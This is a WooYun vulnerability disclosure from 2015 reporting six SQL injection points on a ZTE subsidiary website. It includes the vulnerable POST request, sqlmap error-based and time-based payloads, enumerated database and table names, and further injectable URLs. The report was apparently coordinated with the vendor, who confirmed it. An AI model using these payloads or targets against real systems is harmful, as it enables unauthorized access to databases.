当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105547

漏洞标题:中兴某分站6处SQL注入打包

相关厂商:中兴通讯股份有限公司

漏洞作者: Taro

提交时间:2015-04-07 10:58

修复时间:2015-05-22 14:14

公开时间:2015-05-22 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经确认,细节仅向厂商公开
2015-04-17: 细节向核心白帽子及相关领域专家公开
2015-04-27: 细节向普通白帽子公开
2015-05-07: 细节向实习白帽子公开
2015-05-22: 细节向公众公开

简要描述:

rt...

详细说明:

中兴国通通讯装备技术(北京)有限公司
POST注入
www.zte-gt.com/feedback/post.php
--data="act=formsend&address=e&content=&email=e&groupid=&ImgCode=e&name=e&products_num=e&tel=e&title=e"

E30BAFC91B7A4943BCD07FF096D88FE3.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: groupid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act=formsend&address=e&content=&email=e&groupid=' AND (SELECT 1640
FROM(SELECT COUNT(*),CONCAT(0x7164796371,(SELECT (CASE WHEN (1640=1640) THEN 1 E
LSE 0 END)),0x716c647a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SE
TS GROUP BY x)a) AND 'iabH'='iabH&ImgCode=e&name=e&products_num=e&tel=e&title=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=formsend&address=e&content=&email=e&groupid=' AND SLEEP(5) AND
'VHle'='VHle&ImgCode=e&name=e&products_num=e&tel=e&title=e
---
[10:07:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[10:07:37] [INFO] fetching database names
[10:07:38] [WARNING] reflective value(s) found and filtering out
[10:07:38] [INFO] the SQL query used returns 2 entries
[10:07:40] [INFO] retrieved: information_schema
[10:07:42] [INFO] retrieved: ztegt
available databases [2]:
[*] information_schema
[*] ztegt
[99 tables]
+--------------------------+
| pwn_advs_duilian |
| pwn_advs_lb |
| pwn_advs_lbgroup |
| pwn_advs_link |
| pwn_advs_linkgroup |
| pwn_advs_logo |
| pwn_advs_movi |
| pwn_advs_pic |
| pwn_advs_pop |
| pwn_advs_text |
| pwn_base_admin |
| pwn_base_adminauth |
| pwn_base_adminmenu |
| pwn_base_adminrights |
| pwn_base_border |
| pwn_base_coltype |
| pwn_base_config |
| pwn_base_pageset |
| pwn_base_pagetemp |
| pwn_base_plus |
| pwn_base_plusdefault |
| pwn_base_plusplan |
| pwn_base_plusplanid |
| pwn_base_plustemp |
| pwn_base_version |
| pwn_comment |
| pwn_comment_cat |
| pwn_comment_config |
| pwn_down_cat |
| pwn_down_con |
| pwn_down_config |
| pwn_down_downlog |
| pwn_down_pages |
| pwn_down_pcat |
| pwn_down_proj |
| pwn_down_prop |
| pwn_feedback |
| pwn_feedback_group |
| pwn_feedback_info |
| pwn_job |
| pwn_job_form |
| pwn_job_telent |
| pwn_member |
| pwn_member_buylist |
| pwn_member_cat |
| pwn_member_centlog |
| pwn_member_centrule |
| pwn_member_centset |
| pwn_member_config |
| pwn_member_defaultrights |
| pwn_member_fav |
| pwn_member_friends |
| pwn_member_group |
| pwn_member_msn |
| pwn_member_notice |
| pwn_member_nums |
| pwn_member_pay |
| pwn_member_paycenter |
| pwn_member_regstep |
| pwn_member_rights |
| pwn_member_secure |
| pwn_member_type |
| pwn_member_zone |
| pwn_menu |
| pwn_menu_group |
| pwn_news_cat |
| pwn_news_con |
| pwn_news_config |
| pwn_news_downlog |
| pwn_news_pages |
| pwn_news_pcat |
| pwn_news_proj |
| pwn_news_prop |
| pwn_page |
| pwn_page_group |
| pwn_photo_cat |
| pwn_photo_con |
| pwn_photo_config |
| pwn_photo_pages |
| pwn_photo_pcat |
| pwn_photo_proj |
| pwn_photo_prop |
| pwn_product_cat |
| pwn_product_con |
| pwn_product_config |
| pwn_product_pages |
| pwn_product_pcat |
| pwn_product_proj |
| pwn_product_prop |
| pwn_tools_code |
| pwn_tools_photopolldata |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig |
| pwn_tools_polldata |
| pwn_tools_pollindex |
| pwn_tools_statbase |
| pwn_tools_statcome |
| pwn_tools_statcount |
| pwn_tools_statdate |
+--------------------------+


剩下五处注入点:

www.zte-gt.com/search/index.php?imageField=&key=%5c
www.zte-gt.com/news/index.php?catid=0&imageField=&key=%5c
www.zte-gt.com/news/class/index.php?author=&catid=78&key=%5c&myord=dtime&myshownums=&page=1&showdate=&showtj=
www.zte-gt.com/product/index.php?author=&catid=0&key=%5c&myord=uptime&myshownums=&page=1&showtj=


漏洞证明:

修复方案:

版权声明:转载请注明来源 Taro@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-07 14:13

厂商回复:

感谢~

最新状态:

暂无


漏洞评价:

评论